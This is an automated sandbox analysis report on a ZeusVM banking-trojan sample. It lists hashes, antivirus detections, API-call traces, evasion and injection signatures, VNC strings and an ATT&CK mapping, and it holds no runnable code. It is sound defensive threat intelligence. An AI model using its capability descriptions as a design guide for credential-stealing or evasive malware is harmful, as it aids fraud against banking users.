Analysis Report E7CThb0bFa

Overview

General Information

Sample Name:E7CThb0bFa (renamed file extension from none to exe)
Analysis ID:381780
MD5:ba28a06e2aae1052319541d4124122c5
SHA1:20613e49ee5b14dc04c7b045900f1d0e1b4173be
SHA256:9738c7021fdded8bb03e1588d17386dc175328630ecb0f1a3d671dfc4fb18d46
Tags:uncategorized

Detection

ZeusVM
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected ZeusVM e-Banking Trojan
Multi AV Scanner detection for submitted file
Contains VNC / remote desktop functionality (version string found)
Contains functionality to detect sleep reduction / modifications
Injects a PE file into a foreign processes
Machine Learning detection for sample
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
May check if the current machine is a sandbox (GetTickCount - Sleep)
May initialize a security null descriptor
Program does not show much activity (idle)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • E7CThb0bFa.exe (PID: 6988 cmdline: 'C:\Users\user\Desktop\E7CThb0bFa.exe' MD5: BA28A06E2AAE1052319541D4124122C5)
    • E7CThb0bFa.exe (PID: 7048 cmdline: C:\Users\user\Desktop\E7CThb0bFa.exe MD5: BA28A06E2AAE1052319541D4124122C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: E7CThb0bFa.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: E7CThb0bFa.exeVirustotal: Detection: 84%
Source: E7CThb0bFa.exeReversingLabs: Detection: 92%
Machine Learning detection for sample
Source: E7CThb0bFa.exeJoe Sandbox ML: detected
Source: 1.2.E7CThb0bFa.exe.400000.0.unpackAvira: Label: TR/Kazy.MK
Source: 0.2.E7CThb0bFa.exe.24e0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
Source: 1.1.E7CThb0bFa.exe.400000.0.unpackAvira: Label: TR/Kazy.MK
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_00408558 CryptUnprotectData,LocalFree,1_2_00408558
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_00412FA3 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,1_2_00412FA3
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_00408558 CryptUnprotectData,LocalFree,1_1_00408558
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_00412FA3 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,1_1_00412FA3
Source: E7CThb0bFa.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_004113A5 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,1_2_004113A5
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_004113A5 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,1_1_004113A5
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_00405304 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405304
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_00417437 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,1_2_00417437
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_0041737C FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,1_2_0041737C
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_00417437 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,1_1_00417437
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_0041737C FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,1_1_0041737C
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_00414C41 select,recv,1_2_00414C41
Source: E7CThb0bFa.exeString found in binary or memory: http://www.google.com/webhp
Source: E7CThb0bFa.exe, 00000000.00000002.637292990.00000000024E0000.00000004.00000001.sdmp, E7CThb0bFa.exe, 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.google.com/webhpbc
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_0041047C GetClipboardData,GlobalLock,EnterCriticalSection,LeaveCriticalSection,GlobalUnlock,1_2_0041047C
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_0042D190 GetKeyboardState,0_2_0042D190

E-Banking Fraud:

Detected ZeusVM e-Banking Trojan
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_00419084 lstrcmpiA,lstrcmpiA,lstrcmpiA,CloseHandle,1_2_00419084
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_00419084 lstrcmpiA,lstrcmpiA,lstrcmpiA,CloseHandle,1_1_00419084
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_004108EC OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation,1_2_004108EC
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_0044A56C NtdllDefWindowProc_A,0_2_0044A56C
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_00430020 NtdllDefWindowProc_A,GetCapture,0_2_00430020
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_00424C58 NtdllDefWindowProc_A,0_2_00424C58
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_0044AD10 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_0044AD10
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_0044ADC0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_0044ADC0
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_0043F83C GetSubMenu,SaveDC,RestoreDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_0043F83C
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_00413620 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,1_2_00413620
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_00418801 InitiateSystemShutdownExW,ExitWindowsEx,1_2_00418801
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_0041D21C CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,1_2_0041D21C
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_00418801 InitiateSystemShutdownExW,ExitWindowsEx,1_1_00418801
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_0041D21C CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,1_1_0041D21C
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_00444A1C0_2_00444A1C
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_0043F83C0_2_0043F83C
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_00414A511_2_00414A51
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_0040D6D41_2_0040D6D4
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_00412EAF1_2_00412EAF
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_0040171B1_2_0040171B
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_00414A511_1_00414A51
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_0040D6D41_1_0040D6D4
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_00412EAF1_1_00412EAF
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_0040171B1_1_0040171B
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: String function: 004041E0 appears 68 times
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: String function: 00406324 appears 61 times
Source: E7CThb0bFa.exe, 00000000.00000002.637101486.0000000000A90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs E7CThb0bFa.exe
Source: E7CThb0bFa.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
Source: classification engineClassification label: mal80.bank.troj.evad.winEXE@3/0@0/0
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_0041DA04 GetLastError,FormatMessageA,0_2_0041DA04
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_00405554 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,1_2_00405554
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_004053DF CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,1_2_004053DF
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_00405554 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,1_1_00405554
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_004053DF CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,1_1_004053DF
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_004133CA GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,1_2_004133CA
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_004133CA GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,1_1_004133CA
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_004085C0 GetDiskFreeSpaceA,0_2_004085C0
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_0040647F CloseHandle,CloseHandle,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle,GetLengthSid,CloseHandle,Process32NextW,CloseHandle,1_2_0040647F
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_00408C77 CoCreateInstance,1_2_00408C77
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_00406179 CompareStringA,RtlEnterCriticalSection,FindResourceA,0_2_00406179
Source: C:\Users\user\Desktop\E7CThb0bFa.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\E7CThb0bFa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\E7CThb0bFa.exe 'C:\Users\user\Desktop\E7CThb0bFa.exe'
Source: C:\Users\user\Desktop\E7CThb0bFa.exeProcess created: C:\Users\user\Desktop\E7CThb0bFa.exe C:\Users\user\Desktop\E7CThb0bFa.exe
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_00424218 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00424218
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_3_0232BE08 push FAF50000h; retn 0000h0_3_0232BE0D
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_3_0232CB68 push ds; retf 0000h0_3_0232D370
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_3_0232D354 push ds; retf 0000h0_3_0232D370
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_3_02327FA0 pushad ; retf 0000h0_3_02327FBF
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_3_0232741D pushfd ; retn 0003h0_3_02327429
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_3_02329865 push edx; iretd 0_3_0232988C
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_3_0232ACA4 pushad ; retf 0_3_0232ADC2
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_3_02328C9C push ss; retf 004Ch0_3_02336AFF
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_3_02329100 push eax; ret 0_3_02329152
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_3_0232E57F push ss; iretd 0_3_0232E59F
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_3_0232C550 pushfd ; retf 0_3_0232C551
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_3_0232D9B3 push edx; retf 0000h0_3_0232D9EC
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_3_0232BDF4 push ds; ret 0_3_0232BE07
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_3_023289E0 push ebx; ret 0_3_02328A0A
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_3_02329DEB push ebx; retf 0000h0_3_02329DEC
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_00437334 push 004373C1h; ret 0_2_004373B9
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_0044A5F4 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,0_2_0044A5F4
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_004225DC IsIconic,GetWindowPlacement,GetWindowRect,0_2_004225DC
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_00432878 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,0_2_00432878
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_0044AD10 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_0044AD10
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_0044ADC0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_0044ADC0
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_004475DC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,0_2_004475DC
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_00431744 IsIconic,GetCapture,0_2_00431744
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_00431FF8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,0_2_00431FF8
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_00424218 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00424218

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_00426D880_2_00426D88
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,0_2_00449B50
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_00405304 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405304
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_00417437 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,1_2_00417437
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_0041737C FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,1_2_0041737C
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_00417437 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,1_1_00417437
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_0041737C FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,1_1_0041737C
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_0041DFA0 GetSystemInfo,0_2_0041DFA0
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_00424218 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00424218
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_0041C2AE mov edx, dword ptr fs:[00000030h]1_2_0041C2AE
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_1_0041C2AE mov edx, dword ptr fs:[00000030h]1_1_0041C2AE
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_0041C5F3 GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetLengthSid,GetCurrentProcessId,1_2_0041C5F3

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\E7CThb0bFa.exeMemory written: C:\Users\user\Desktop\E7CThb0bFa.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\E7CThb0bFa.exeProcess created: C:\Users\user\Desktop\E7CThb0bFa.exe C:\Users\user\Desktop\E7CThb0bFa.exe
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_004152ED InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,1_2_004152ED
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_004054DC
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: GetLocaleInfoA,GetACP,0_2_0040C424
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: GetLocaleInfoA,0_2_0040AE50
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: GetLocaleInfoA,0_2_0040AE9C
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: GetLocaleInfoA,0_2_00405E24
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_00409924 GetLocalTime,0_2_00409924
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_00407242 GetTickCount,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW,1_2_00407242
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_00411E28 GetTimeZoneInformation,1_2_00411E28
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 0_2_00437334 GetVersion,0_2_00437334
Source: E7CThb0bFa.exe, 00000000.00000002.637292990.00000000024E0000.00000004.00000001.sdmpBinary or memory string: S:(ML;;NRNWNX;;;LW)SeSecurityPrivilegeS:(ML;CIOI;NRNWNX;;;LW)?O?I?Tcabcabinet.dllFCICreateFCIAddFileFCIFlushCabinetFCIDestroybcdfghklmnpqrstvwxzaeiouyGlobal\Local\

Remote Access Functionality:

Contains VNC / remote desktop functionality (version string found)
Source: E7CThb0bFa.exe, 00000000.00000002.637292990.00000000024E0000.00000004.00000001.sdmpString found in binary or memory: RFB 003.003
Source: E7CThb0bFa.exe, 00000000.00000002.637292990.00000000024E0000.00000004.00000001.sdmpString found in binary or memory: .exe-fSysListView32MDIClientCiceroUIWndFrameConsoleWindowClass#32768SysShadowFIXMERFB 003.003
Source: E7CThb0bFa.exeString found in binary or memory: RFB 003.003
Source: E7CThb0bFa.exe, 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmpString found in binary or memory: .exe-fSysListView32MDIClientCiceroUIWndFrameConsoleWindowClass#32768SysShadowFIXMERFB 003.003
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_0041511E socket,bind,closesocket,1_2_0041511E
Source: C:\Users\user\Desktop\E7CThb0bFa.exeCode function: 1_2_00414E40 socket,bind,listen,closesocket,1_2_00414E40

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Native API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1Input Capture11System Time Discovery2Remote Desktop Protocol1Archive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsScheduled Task/JobCreate Account1Valid Accounts1Obfuscated Files or Information21LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Valid Accounts1Access Token Manipulation11Install Root Certificate1Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Process Injection111Software Packing11NTDSSystem Information Discovery15Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptValid Accounts1LSA SecretsNetwork Share Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation11Cached Domain CredentialsSecurity Software Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection111DCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemApplication Window Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source           Detection  Scanner         Label
E7CThb0bFa.exe   85%        Virustotal
E7CThb0bFa.exe   93%        ReversingLabs   Win32.Trojan.Zeus
E7CThb0bFa.exe   100%       Avira           TR/Crypt.ZPACK.Gen
E7CThb0bFa.exe   100%       Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source                                  Detection  Scanner  Label
1.0.E7CThb0bFa.exe.400000.0.unpack      100%       Avira    TR/Crypt.XPACK.Gen
0.2.E7CThb0bFa.exe.400000.0.unpack      100%       Avira    TR/Crypt.XPACK.Gen
1.2.E7CThb0bFa.exe.400000.0.unpack      100%       Avira    TR/Kazy.MK
0.2.E7CThb0bFa.exe.24e0000.2.unpack     100%       Avira    TR/Patched.Ren.Gen
1.1.E7CThb0bFa.exe.400000.0.unpack      100%       Avira    TR/Kazy.MK
0.0.E7CThb0bFa.exe.400000.0.unpack      100%       Avira    TR/Crypt.XPACK.Gen

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:381780
Start date:05.04.2021
Start time:02:53:56
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 12s
